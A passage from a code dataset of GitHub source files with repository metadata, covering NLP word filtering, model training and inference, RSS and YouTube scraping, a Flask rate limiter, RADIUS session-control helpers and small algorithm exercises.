all_content_words = all_content_words.union(content_words)\n\n return list(all_content_words)\n\n\ndef clean_content_words(content_words: list) -> set:\n \"\"\"\n Given a set of content words, removes stopwords and words that are too short.\n\n Parameters\n ----------\n content_words : A list of content words.\n\n Returns\n ----------\n A set of content words that are not stopwords and are longer than 2 characters.\n \"\"\"\n # convert content words to set\n content_words = set(content_words)\n\n # convert all words to lowercase\n content_words = set([word.lower() for word in content_words])\n\n # remove stopwords\n stop_words = set(stopwords.words('english'))\n\n # extend the stop words with the following words\n other_words = set(['york', 'states', 'book', 'part', 'cambridge', \n 'harvard', 'institution', 'press', 'even', 'princeton',\n 'united', 'known', 'chapter', 'chicago', 'brookings', \n 'washington', 'oxford', 'paper', 'clarendon', 'hopkins',\n 'cent', 'wiley', 'chapters', 'publishing', 'would', 'first',\n 'american', 'review', 'bureau', 'per', 'em', 'great', 'years',\n 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight',\n 'nine', 'ten', 'zero', 'de', 'reviews', 'graduate', 'volume',\n 'year', 'author', 'authors', 'cent', 'way', 'analysis',\n 'period', 'problem', 'economy', 'economic', 'percent', 'equation',\n 'example', 'countries', 'journal', 'university', 'parameter',\n 'problems', 'discussion', 'solution', 'relation', 'country',\n 'difference', 'coefficient', 'regression', 'method', 'economists',\n 'equations', 'matrix', 'outcome', 'literature', 'nation', 'capita',\n 'assumptions', 'standard', 'others', 'america', 'europe', \n 'parameters', 'argument', 'conclusion', 'economies', 'amsfonts',\n 'stmaryrd', 'xspace', 'fontenc', 'amsmath', 'amssymb', 'aastex',\n 'mathrsfs', 'wncyss', 'amsbsy', 'portland', 'region', 'sumption',\n 'person', 'concept', 'alternative', 'coefficients', 'london',\n 'statistics', 'librium', 'correlation', 'periods', 'outcomes',\n 'success', 'equilib', 'addition', 'economist', 'methods'])\n\n\n content_words = set([word for word in content_words if word not in stop_words])\n\n content_words = set([word for word in content_words if word not in other_words])\n\n content_words = set([word for word in content_words if nltk.pos_tag([word])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS']])\n\n # remove words that are too short\n content_words = set([word for word in content_words if len(word) > 5])\n\n # remove verbs\n content_words = filter_verbs(content_words)\n\n return content_words\n\n\ndef filter_verbs(content_words: set) -> set:\n \"\"\"\n Given a set of content words, removes verbs,\n by using wordnet to check if the words can be lemmatized to a verb.\n\n Parameters\n ----------\n content_words : A set of content words.\n\n Returns\n ----------\n A set of content words that are not verbs.\n \"\"\"\n # convert content words to a list\n content_words = list(content_words)\n\n for word in content_words:\n synsets = wordnet.synsets(word)\n\n for synset in synsets:\n if synset.pos() == 'v':\n content_words.remove(word)\n break\n\n return set(content_words)\n\n\ndef filter_numerical_values(content_words: set) -> set:\n \"\"\"\n Filter out content words that contain a numerical value,\n such as '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'.\n\n Parameters\n ----------\n content_words : A set of content words.\n\n Returns\n ----------\n A set of content words that do not contain a numerical value.\n \"\"\"\n content_words = list(content_words)\n\n for word in content_words:\n if any(char.isdigit() for char in word):\n content_words.remove(word)\n\n return set(content_words)\n\n\ndef combine_text_parts(text: list) -> str:\n \"\"\"\n Given a list of text parts, combines them into a single string.\n\n Parameters\n ----------\n text : A list of text parts.\n\n Returns\n ----------\n A string containing all text parts.\n \"\"\"\n combined_text = ''\n for part in text:\n combined_text += part + ' '\n\n return combined_text\n\n\ndef preprocess_docs(documents: list) -> list:\n \"\"\"\n Given a list of documents, preprocesses them by combining the text parts\n in each document, changing every document to lowercase, and removing line breaks.\n\n Parameters\n ----------\n documents : A list of documents.\n\n Returns\n ----------\n A list of preprocessed documents.\n \"\"\"\n preprocessed_docs = []\n for document in documents:\n # combine text parts\n document = combine_text_parts(document)\n\n # change to lowercase\n document = document.lower()\n\n # remove line breaks\n document = document.replace('\\n', ' ')\n document = document.replace('- ', '')\n\n preprocessed_docs.append(document)\n\n return preprocessed_docs\n\n\ndef get_top_k_content_words(document: str, top: int = 10) -> list:\n \"\"\"\n Given a document, returns the top k content words.\n\n Parameters\n ----------\n document : A string representing a document.\n\n top : An integer representing the number of top content words to return.\n\n Returns\n ----------\n A list of the top k content words.\n \"\"\"\n content_words_set = set(get_nltk_content_words([document]))\n content_words_set = filter_numerical_values(filter_verbs(clean_content_words(list(content_words_set))))\n\n word_counts = {}\n\n # count the number of appearances of each content word in each document\n for word in content_words_set:\n word_counts[word] = word_counts.get(word, 0) + document.count(word)\n\n # sort the content words by their counts\n sorted_word_counts = sorted(word_counts.items(), key=lambda x: x[1], reverse=True)\n\n # get the k most frequent content words and return them as a list\n return [word[0] for word in sorted_word_counts[:top]]","repo_name":"LFesser97/Predoc","sub_path":"language_change/nltk_content_words.py","file_name":"nltk_content_words.py","file_ext":"py","file_size_in_byte":11302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3743037495","text":"import tensorflow as tf\nfrom sklearn.metrics import roc_auc_score\nfrom tensorflow.python.platform import gfile\nimport numpy as np\nimport os\nimport data_reader\nfrom train_model import model\n\n\nx, y, test_data, vocabulary = data_reader.load_data()\n\nx_train, x_val = np.concatenate((x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319],x[:26319], x[26349:-300])), np.concatenate((x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349],x[26319:26349], x[-300:]))\ny_train, y_val = np.concatenate((y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319],y[:26319], y[26349:-300])), np.concatenate((y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349],y[26319:26349], y[-300:]))\n_index = np.random.permutation(np.arange(len(x_train)))\nx_train = x_train[_index]\ny_train = y_train[_index]\n\narticle_length = x_train.shape[1]\nout_dir = \"logs/\"\nsess = tf.Session()\nwith sess.as_default():\n model_ = model(article_length=article_length,vocab_size=len(vocabulary))\n\n global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n optimizer = tf.train.AdamOptimizer(2e-4)\n train_op = optimizer.apply_gradients(optimizer.compute_gradients(model_.loss), global_step=global_step)\n \n \n saver = tf.train.Saver(tf.all_variables())\n sess.run(tf.initialize_all_variables())\n ckpt = tf.train.get_checkpoint_state(os.path.join(out_dir, 'checkpoints'))\n\n def eval(x_batch, y_batch):\n feed_dict = {model_.train_articles: x_batch, model_.dropout: 1.0}\n ans1 = sess.run([model_.pred_score], feed_dict)\n auc = roc_auc_score(y_batch,ans1[0])\n if(auc > 0.92):\n test(test_data)\n return True\n print(\"\\n\" + str(auc))\n return False\n \n def test(x_batch):\n len_ = x_batch.shape[0]\n output = open(\"./pre.txt\",\"w\")\n output_ = open(\"./pre_score.txt\",\"w\")\n output__ = open(\"./pre_score1.txt\",\"w\")\n for k in range(len_):\n print(\"running \" + str(k))\n feed_dict = {\n model_.train_articles: np.array([x_batch[k]]), model_.dropout: 1.0\n }\n #ans = sess.run([model_.predictions], feed_dict)\n ans1 = sess.run([model_.pred_score], feed_dict)\n #output.write('%f\\n' % ans[0])\n #output_.write('%f\\n' % ans1[0][0][0])\n output__.write('%f\\n' % (1.0 - ans1[0][0][0]))\n print(\"test_finished!\")\n\n batches = data_reader.batch_iter(zip(x_train, y_train), 16, 10)\n checkpoint_dir = os.path.abspath(os.path.join(out_dir, \"checkpoints\"))\n for batch in batches:\n x_batch, y_batch = zip(*batch)\n feed_dict = {model_.train_articles: x_batch,model_.train_labels: y_batch,model_.dropout: 0.5}\n op, step, loss, accuracy = sess.run([train_op, global_step, model_.loss, model_.accuracy],feed_dict)\n print(\"step {}, loss {:g}, acc {:g}\".format(step, loss, accuracy))\n current_step = tf.train.global_step(sess, global_step)\n if current_step % 100 == 0:\n if eval(x_val, y_val):\n break\n saver.save(sess, os.path.join(checkpoint_dir, \"model\"), global_step=current_step)\n","repo_name":"shichaosuper/An-End-to-end-solution-for-Semantic-Modeling","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15651527462","text":"import os\nimport torch\n\nimport numpy as np\nimport soundfile as sf\nfrom tqdm.auto import tqdm\nimport time\n\nfrom model.model_cnn_lstm_causal import ConvLSTM\nfrom model.stft import StftHandler\n\nfrom dataset import DatasetInf, DataLoader\n\n\n\ndef build_model(path_state):\n snapshot = torch.load(\n os.path.join(path_state, 'last_snapshot.tar'),\n map_location='cpu'\n )\n conv_kwargs = dict(\n dim=256,\n conv_expansion_factor=2,\n conv_kernel_size=31,\n conv_dropout=0.1,\n )\n model = ConvLSTM(\n stft=StftHandler(),\n num_layers=4,\n inp_dim=257,\n out_dim=257,\n conv_kwargs=conv_kwargs, )\n\n state_dict = snapshot['model']\n model.load_state_dict(state_dict)\n model.eval()\n for p in model.parameters():\n p.requires_grad = False\n\n return model\n\ndef build_data(folder_path, batch_size):\n np.random.seed(77)\n torch.manual_seed(42)\n farend_path = os.path.join(folder_path, 'farend_speech')\n near_mic_path = os.path.join(folder_path, 'nearend_mic_signal')\n near_speech_path = os.path.join(folder_path, 'nearend_speech')\n\n\n test_dataset = DatasetInf(farend_path, near_mic_path, near_speech_path)\n test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=4)\n\n return test_loader\n\n\ndef processing_signal(farend, near_mic, model, t, device):\n first_step = 480\n frame = int(t * 16000 / 1000)\n\n current_frame_farend = farend[:, :first_step]\n rest_signal_farend = farend[:, first_step:]\n\n current_frame_mic = near_mic[:, :first_step]\n rest_signal_mic = near_mic[:, first_step:]\n\n #минимальная необходимая задержка 480 отчетов\n #то есть 30мс\n array_out = torch.zeros(480).to(device)\n print('processing signal by 1 sec')\n t_out = []\n while rest_signal_farend.shape[-1] > 0:\n\n frame_tmp_farend = rest_signal_farend[:, :frame]\n current_frame_farend = torch.cat((current_frame_farend, frame_tmp_farend), 1)\n\n frame_tmp_mic = rest_signal_mic[:, :frame]\n current_frame_mic = torch.cat((current_frame_mic, frame_tmp_mic), 1)\n\n start_time = time.time()\n current_pred = model(current_frame_farend, current_frame_mic)\n print(\"--- %s seconds ---\" % (time.time() - start_time), frame_tmp_farend.shape)\n\n t_out.append(time.time() - start_time)\n array_out = torch.cat((array_out, current_pred[0][-frame:]), 0)\n\n rest_signal_farend = rest_signal_farend[:, frame:]\n rest_signal_mic = rest_signal_mic[:, frame:]\n print(np.mean(t_out))\n return array_out\n\n\ndef processing_1sec(farend, near_mic, model, device):\n farend = torch.from_numpy(farend)\n near_mic = torch.from_numpy(near_mic)\n\n farend = farend.to(device, dtype=torch.float)\n farend = farend.unsqueeze(0)\n\n near_mic = near_mic.to(device, dtype=torch.float)\n near_mic = near_mic.unsqueeze(0)\n\n first_step = 16000\n\n current_frame_farend = farend[:, :first_step]\n current_frame_mic = near_mic[:, :first_step]\n\n print('warm up')\n for i in range(2):\n current_pred = model(current_frame_farend, current_frame_mic)\n\n t_out = []\n print('processing 1 sec')\n for i in range(30):\n\n start_time = time.time()\n current_pred = model(current_frame_farend, current_frame_mic)\n print(\"--- %s seconds ---\" % (time.time() - start_time), current_pred.shape)\n\n t_out.append(time.time() - start_time)\n print(np.mean(t_out))\n\ndef main():\n device = 'cpu'\n path_state = './results/cnn_lstm_causal'\n\n model = build_model(path_state)\n model = model.to(device)\n\n val_loader = build_data(folder_path='dataset-test-real', batch_size=1)\n farend, near_mic, target, path_id = next(iter(val_loader))\n\n\n # target = target[0].detach().cpu().numpy()\n\n\n #Проверка на скорость обработки одной секунды сигнала:\n #Обрабатывается только одна секунда сигнала, без записи\n #и без учета предыдущих\n farend_test = farend[0].detach().cpu().numpy()\n near_mic_test = near_mic[0].detach().cpu().numpy()\n test_1 = processing_1sec(farend_test, near_mic_test, model, device)\n\n\n\n #Предсказание на 6 рандомных сэмплах из датасета Real\n #Задержка 30мс\n #Сигнал обрабатывается каждую секунду, с учетом предыдущих секунд\n for farend, near_mic, target, path_id in tqdm(val_loader):\n farend = farend.to(device, dtype=torch.float)\n near_mic = near_mic.to(device, dtype=torch.float)\n\n pred = processing_signal(farend, near_mic, model, t=1000, device='cpu')\n sf.write(f'./dataset-test-real/pred_cnn/{path_id[0]}_pred.wav', pred.detach().cpu().numpy(), samplerate=16_000)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"panamka/AEC","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27835643203","text":"\"\"\"\nDefine the class Source responsible for the extraction of article links from rss feeds.\n\"\"\"\n\nimport datetime as dt\nimport time\nimport typing\nimport logging\nimport feedparser\nimport newspaper as np\nfrom newspaper.article import ArticleException\n\nlogger = logging.getLogger('genderednews.rss_source')\nlogger_debug = logging.getLogger('genderednews_debug.rss_source')\n\n\nclass RssSource():\n \"\"\"\n The class Source is responsible for extracting links from rss feeds.\n \"\"\"\n USER_AGENT = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'\n\n def __init__(self, rss_feed_links: typing.List[str], source_name: str) -> None:\n self.rss_feed_links = rss_feed_links\n self.name = source_name\n\n # Config newspaper (to avoid read time out error)\n self.config = np.Config()\n self.config.browser_user_agent = self.USER_AGENT\n self.config.request_timeout = 10\n\n def _scrape_one_xml(self, source_link: str) -> typing.List[typing.Dict]:\n \"\"\"\n Scrape all the articles links from one xml RSS feed.\n \"\"\"\n\n # Parse the xml file\n rss_feed = feedparser.parse(source_link)\n\n for entry in rss_feed.entries:\n # Check if there are missing links\n try:\n if not entry.link:\n raise RuntimeError(\n 'No link for {entry}. You can try to look into rss_feed variable.')\n except AttributeError:\n continue\n\n # Conversion of published date in datetime format\n try:\n entry.datetime = dt.datetime.fromtimestamp(\n time.mktime(entry.published_parsed))\n\n # Retrieve published date in the metadata of the article\n except (AttributeError, KeyError):\n article = np.Article(\n entry.link, language='fr', config=self.config)\n try:\n article.download()\n article.parse()\n except ArticleException:\n # Ignore this article (article url not working)\n entry.datetime = dt.datetime.now() - dt.timedelta(days=10)\n continue\n try:\n entry.datetime = article.publish_date.replace(tzinfo=None)\n except AttributeError:\n # Ignore this article (publish_date == None)\n entry.datetime = dt.datetime.now() - dt.timedelta(days=10)\n continue\n\n # Return the entries published yesterday\n return rss_feed.entries\n\n def scrape_all_xml(self) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of all entries (dict with 'link' & 'date') from this source.\n \"\"\"\n\n article_entries = []\n for feed in self.rss_feed_links:\n newsfeed = self._scrape_one_xml(feed)\n for entry in newsfeed:\n try:\n if entry.link:\n logger_debug.debug(f'Article found: {entry.link}')\n article_entries.append(\n {'link': entry.link, 'date': entry.datetime})\n except AttributeError:\n continue\n logger_debug.debug(f'{len(article_entries)} articles found.')\n\n return article_entries\n\n def get_entries_from_to(self, from_date: dt.datetime, to_date: dt.datetime) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of entries (dict with 'link' & 'date') from this source that has been published between [from_date, to_date].\n The granularity is at the level of the day.\n \"\"\"\n\n return [entry for entry in self.scrape_all_xml() if from_date.date() <= entry['date'].date() <= to_date.date()]\n\n def get_entries_of_yesterday(self) -> typing.List[typing.Dict]:\n \"\"\"\n Return an array of entries (dict with 'link' & 'date') from this source that has been published yesterday.\n The granularity is at the level of the day.\n \"\"\"\n\n yesterday = dt.datetime.now() - dt.timedelta(days=1)\n return self.get_entries_from_to(yesterday, yesterday)\n","repo_name":"getalp/genderednews","sub_path":"gn_modules/scraping_and_extraction/rss_source.py","file_name":"rss_source.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"41761746146","text":"from apiclient.discovery import build\nimport pandas as pd\nimport time\nfrom conf import conf_sandbox\n\nyoutube = build(\n conf_sandbox[\"youtube\"][\"api_service_name\"],\n conf_sandbox[\"youtube\"][\"api_version\"],\n developerKey=conf_sandbox[\"youtube\"][\"developer_key\"]\n)\n\n\ndef get_videos(youtube, channelId, order):\n search_response = youtube.search().list(\n channelId=channelId,\n type=\"video\",\n part=\"id,snippet\",\n maxResults=50,\n order=order\n ).execute()\n\n return search_response.get(\"items\", [])\n\n\ndef get_comment_threads():\n videos = get_videos(youtube, conf_sandbox[\"youtube\"][\"channel_id\"], \"viewCount\")\n\n temp_comments = []\n for video in videos:\n time.sleep(1.0)\n results = youtube.commentThreads().list(\n part=\"snippet\",\n videoId=video[\"id\"][\"videoId\"],\n textFormat=\"plainText\",\n maxResults=20,\n order='relevance'\n ).execute()\n\n for item in results[\"items\"]:\n comment = item[\"snippet\"][\"topLevelComment\"]\n temp_comments.append(dict(\n videoId=video[\"id\"][\"videoId\"],\n videoName=video[\"snippet\"][\"title\"],\n nbrReplies=item[\"snippet\"][\"totalReplyCount\"],\n author=comment[\"snippet\"][\"authorDisplayName\"],\n likes=comment[\"snippet\"][\"likeCount\"],\n publishedAt=comment[\"snippet\"][\"publishedAt\"],\n text=comment[\"snippet\"][\"textDisplay\"].encode('utf-8').strip()\n ))\n\n return temp_comments\n\n\ndef get_video_infos(videos):\n video_list = {}\n for search_result in videos:\n if search_result[\"id\"][\"kind\"] == \"youtube#video\":\n video_list[search_result[\"id\"][\"videoId\"]] = search_result[\"snippet\"][\"title\"]\n\n s = ','.join(video_list.keys())\n videos_list_response = youtube.videos().list(id=s, part='id,statistics').execute()\n res = []\n for i in videos_list_response['items']:\n temp_res = dict(v_title = video_list[i['id']])\n temp_res.update(i['statistics'])\n res.append(temp_res)\n\n data = pd.DataFrame.from_dict(res)\n data['viewCount'] = data['viewCount'].map(lambda x : float(x))\n data['commentCount'] = data['commentCount'].map(lambda x : float(x))\n\n return data\n\n\ndef get_videos_sorted():\n videos = get_videos(youtube, conf_sandbox[\"youtube\"][\"channel_id\"], \"viewCount\")\n videos_data = get_video_infos(videos)\n\n return videos_data.sort_values(by=['viewCount'], ascending=0).head(20)\n","repo_name":"bogatyrjov1/email-sentiment","sub_path":"sandbox/youtube/fetch_videos/fetch_videos.py","file_name":"fetch_videos.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"26064288882","text":"#!/usr/bin/env python3\nfrom subprocess import Popen, PIPE\nimport click\nfrom Queue import Queue, Empty, Full\nfrom threading import Thread, Lock\nfrom time import sleep\n\n#lot of refernce from http://www.troyfawkes.com/learn-python-multithreading-queues-basics/\n#verbatim from http://stackoverflow.com/questions/3185261/python-threading-and-queues-for-infinite-data-input-stream\n\n#dependency vda-dump from SRA toolkit\n\nclass jointRead:\n def __init__(self, inputStream):\n self.readName = inputStream[0]\n self.nt = inputStream[1]\n self.quality = inputStream[3]\n\ndef dump_mate(queue,\n threadId,\n mate1,\n mate2,\n mutex,\n max_batch_size):\n while True:\n try:\n m1 = \"\"\n m2 = \"\"\n batch_size = 0\n while(batch_size \")\n\n if option == '0':\n cprint(f'Exit, bye bye.', 'green')\n break\n\n elif option == '1':\n amount_str = print_input_amounts_range('Deposit amount')\n run_script(stake, 'scroll', amount_str, [])\n break\n\n\n elif option == '2':\n run_script(withdraw, 'scroll',0, [])\n\n break\n\n elif option == '3':\n run_script(claim, 'scroll', 0, [])\n\n break\n\n else:\n cprint(f'Wrong action. Please try again.\\n', 'red')\n continue\n except KeyboardInterrupt:\n cprint(f' Exit, bye bye\\n', 'red')\n raise SystemExit\n","repo_name":"darcksday/scroll","sub_path":"modules/contracts/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73069024563","text":"def max_path_sum(tree):\n max_sum_branch, runtime_max_sum = max_path_sum_helper(tree)\n return max(max_sum_branch, runtime_max_sum)\n\ndef max_path_sum_helper(tree):\n if not tree:\n return (0, 0)\n\n left_sum_branch, left_sum = max_path_sum_helper(tree.left)\n right_sum_branch, right_sum = max_path_sum_helper(tree.right)\n max_child_sum_branch = max(left_sum_branch, right_sum_branch)\n max_sum_branch = max(max_child_sum_branch + tree.value, tree.value)\n max_sum = max(max_sum_branch, left_sum_branch + tree.value + right_sum_branch)\n runtime_max_sum = max(left_sum, right_sum, max_sum)\n return max_sum_branch, runtime_max_sum\n\n\nclass BinaryTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def insert(self, values, i=0):\n if i >= len(values):\n return\n queue = [self]\n while len(queue) > 0:\n current = queue.pop(0)\n if current.left is None:\n current.left = BinaryTree(values[i])\n break\n queue.append(current.left)\n if current.right is None:\n current.right = BinaryTree(values[i])\n break\n queue.append(current.right)\n self.insert(values, i + 1)\n return self\n\n\n# tree1 = BinaryTree(1).insert([2, 3, 4, 5, 6, 7])\n# print(max_path_sum(tree1))\n\ntree2 = BinaryTree(1).insert([2, 3])\nprint(max_path_sum(tree2))\n","repo_name":"chris-peng-1244/python-quiz","sub_path":"max_path_sum.py","file_name":"max_path_sum.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5269787346","text":"\nimport sys\n\nrows = int(input(\"How many rows of boxes? \"))\ncolumns = int(input(\"How many columns of boxes? \"))\nrow_spaces = int(input(\"How many rows of spaces in each box? \"))\ncolumn_spaces = int(input(\"How many columns of spaces in each box (e.g., 3)? \"))\n\n\nfor i in range(rows):\n\tfor i in range(columns):\n\t print(\"+\",end=\"\")\n\t for i in range(column_spaces):\n\t print(\"-\",end=\"\")\n\tprint(\"+\")\n\n\tfor spaces in range(row_spaces):\n\t for _ in range(columns):\n\t print(\"|\",end=\"\")\n\n\t for space in range(column_spaces):\n\t print(\" \",end=\"\")\n\t \n\t print(\"|\")\n\nfor i in range(columns):\n print(\"+\",end=\"\")\n for i in range(column_spaces):\n print(\"-\",end=\"\")\nprint(\"+\")\n\n#+ and - are characters\n\nsys.exit(0)\n","repo_name":"sf19pb1-petercooper/graph_paper","sub_path":"graph_paper_1.py","file_name":"graph_paper_1.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6603978772","text":"from flask import Flask, jsonify, request,Response, abort, render_template\nfrom flask import render_template\nfrom config import configLimiter\nimport redis\n\n__version__ = \"1.0.0\"\n\n###########################################\n#Class of limiter\n#Limit requests by Redis db\n\n#If exceed the limit, return 429 \n#and go to error.html\n##########################################\nclass Limiter(object):\n \"\"\"Limit requests number by remote address\"\"\"\n def __init__(self, app):\n #set up redis db\n self._config = configLimiter()\n self.REQUEST_ALLOWED = self._config.requests\n self.TIME_SEESION =self._config.timeSession\n self.FREELIST = self._config.freeList\n self.redisDB = redis.StrictRedis(host=self._config.host, port=self._config.port, password=self._config.passwrd, db=self._config.db, socket_timeout=30)\n @app.errorhandler(429)\n def handle_exception(e):\n \"\"\"Return a HTML page for HTTP error 429.\"\"\"\n self.retryTime = self.redisDB.ttl(request.remote_addr) #get the retry-time from redis\n self.description = \"Rate limit exceeded. Try again in \" + str(self.retryTime) + \" seconds\"\n return render_template(\"error.html\", description = self.description, code = e.code, name = e.name), 429\n\n @app.before_request \n def before_request():\n \"\"\"access the db and evaluate whether it reach the limit\"\"\"\n self.ip = request.remote_addr\n if self.ip not in self.FREELIST:\n self.ip_count = self.redisDB.get(self.ip)\n print(\"ip: %s, ip_count: %s\" % (self.ip, self.ip_count))\n if not self.ip_count:\n self.redisDB.set(self.ip, 1,ex=self.TIME_SEESION) # set new key, make it be expired in the period\n else:\n self.redisDB.incr(self.ip) # increase the count of the ip\n if int(self.ip_count) >= self.REQUEST_ALLOWED:\n return abort(429) #if exceed the limit, raise 429 error\n","repo_name":"EvaWw/flaskRateLimiter","sub_path":"rateLimiter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29892971193","text":"import os\nfrom typing import Optional\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.exceptions import APIException\nfrom rest_framework import status\nfrom pyrad.client import Client, Timeout\nfrom pyrad import packet\nfrom pyrad import dictionary\n\n\noptions = getattr(settings, 'RADIUSAPP_OPTIONS')\nif options is None:\n raise ImproperlyConfigured('You must specified RADIUSAPP_OPTIONS in settings')\n\nADDRESS = options.get('server_host')\nSECRET = options.get('secret')\n\nif not all([ADDRESS, SECRET]):\n raise ImproperlyConfigured(\"You must set 'server_host' and 'secret' options to RADIUSAPP_OPTIONS dict\")\ndel options\n\n\ndef _abspath(fname):\n curdir = os.path.dirname(__file__)\n return os.path.join(curdir, fname)\n\n\nclass RadiusBaseException(APIException):\n pass\n\n\nclass RadiusSessionNotFoundException(RadiusBaseException):\n status_code = status.HTTP_404_NOT_FOUND\n default_detail = _('Radius session not found error')\n\n\nclass RadiusTimeoutException(RadiusBaseException):\n status_code = status.HTTP_408_REQUEST_TIMEOUT\n default_detail = _('Radius timeout error')\n\n\nclass RadiusInvalidRequestException(RadiusBaseException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = _('Radius invalid request')\n\n\nclass RadiusMissingAttributeException(RadiusBaseException):\n status_code = status.HTTP_400_BAD_REQUEST\n default_detail = _('Radius missing attibute')\n\n\nclass RadiusInteract:\n client = Client(server=ADDRESS, secret=SECRET, dict=dictionary.Dictionary(_abspath(\"dictionary\")))\n # client.timeout = 30\n\n def coa_inet2guest(self, uname: str):\n # FIXME: move params to radius config\n attrs = {\n 'User-Name': uname,\n 'ERX-Service-Deactivate': 'SERVICE-INET',\n 'ERX-Service-Activate:1': 'SERVICE-GUEST',\n 'ERX-Service-Acct-Interval:1': 14400,\n 'ERX-Service-Statistics:1': 2\n }\n return self.coa(**attrs)\n\n def coa_guest2inet(self, uname: str, speed_in: int, speed_out: int, speed_in_burst: int, speed_out_burst: int):\n attrs = {\n 'User-Name': uname,\n 'ERX-Service-Deactivate': 'SERVICE-GUEST',\n 'ERX-Service-Activate:1': f'SERVICE-INET({speed_in},{speed_in_burst},{speed_out},{speed_out_burst})',\n 'ERX-Service-Acct-Interval:1': 14400,\n 'ERX-Service-Statistics:1': 2\n }\n return self.coa(**attrs)\n\n def coa(self, **attrs):\n # create coa request\n request = self.client.CreateCoAPacket(**attrs)\n return self._process_request(request)\n\n def disconnect(self, uname: str):\n attrs = {\n \"User-Name\": uname\n }\n # create disconnect request\n request = self.client.CreateCoAPacket(code=packet.DisconnectRequest, **attrs)\n return self._process_request(request)\n\n def _process_request(self, request) -> Optional[str]:\n try:\n res = self.client.SendPacket(request)\n if res.code in (packet.CoAACK, packet.AccessAccept, packet.DisconnectACK):\n # ok\n return 'ok'\n res_keys = res.keys()\n exception = None\n if 'Error-Cause' in res_keys:\n errs = res.get('Error-Cause')\n if 'Session-Context-Not-Found' in errs:\n exception = RadiusSessionNotFoundException\n elif 'Invalid-Request' in errs:\n exception = RadiusInvalidRequestException\n elif 'Missing-Attribute' in errs:\n exception = RadiusMissingAttributeException\n\n res_keys.remove('Error-Cause')\n # get err text\n res_text = b'\\n\\n'.join(b'\\n'.join(res.get(i)) for i in res_keys)\n res_text = res_text.decode()\n if exception is not None:\n raise exception(res_text)\n return res_text\n except Timeout as e:\n raise RadiusTimeoutException(e) from e\n\n\n_rad_interact_instance = RadiusInteract()\n\n\ndef _filter_uname(uname: str) -> str:\n _uname = str(uname)\n _uname = _uname.replace('\"', \"\")\n _uname = _uname.replace(\"'\", \"\")\n return _uname\n\n\ndef finish_session(radius_uname: str):\n \"\"\"Send radius disconnect packet to BRAS.\"\"\"\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n return _rad_interact_instance.disconnect(uname=uname)\n\n\ndef change_session_inet2guest(radius_uname: str):\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n # COA inet -> guest\n return _rad_interact_instance.coa_inet2guest(uname=uname)\n\n\ndef change_session_guest2inet(\n radius_uname: str, speed_in: int, speed_out: int, speed_in_burst: int, speed_out_burst: int\n):\n \"\"\"\n Send COA via radclient, change guest service type to inet service type.\n :param radius_uname: User-Name from radius\n :param speed_in: Customer service input speed in bits/s\n :param speed_out: Customer service output speed in bits/s\n :param speed_in_burst: Customer service input speed burst\n :param speed_out_burst: Customer service output speed burst\n :return: boolean, is return code of script is equal 0\n \"\"\"\n if not radius_uname:\n return\n uname = _filter_uname(radius_uname)\n speed_in = int(speed_in)\n speed_out = int(speed_out)\n speed_in_burst, speed_out_burst = int(speed_in_burst), int(speed_out_burst)\n\n # COA guest -> inet\n return _rad_interact_instance.coa_guest2inet(\n uname=uname,\n speed_in=speed_in,\n speed_out=speed_out,\n speed_in_burst=speed_in_burst,\n speed_out_burst=speed_out_burst\n )\n","repo_name":"nerosketch/djing2","sub_path":"apps/networks/radius_commands/radius_commands.py","file_name":"radius_commands.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"29607841947","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def deleteDuplicates(self, head: ListNode) -> ListNode:\n pre = ListNode()\n\n used = 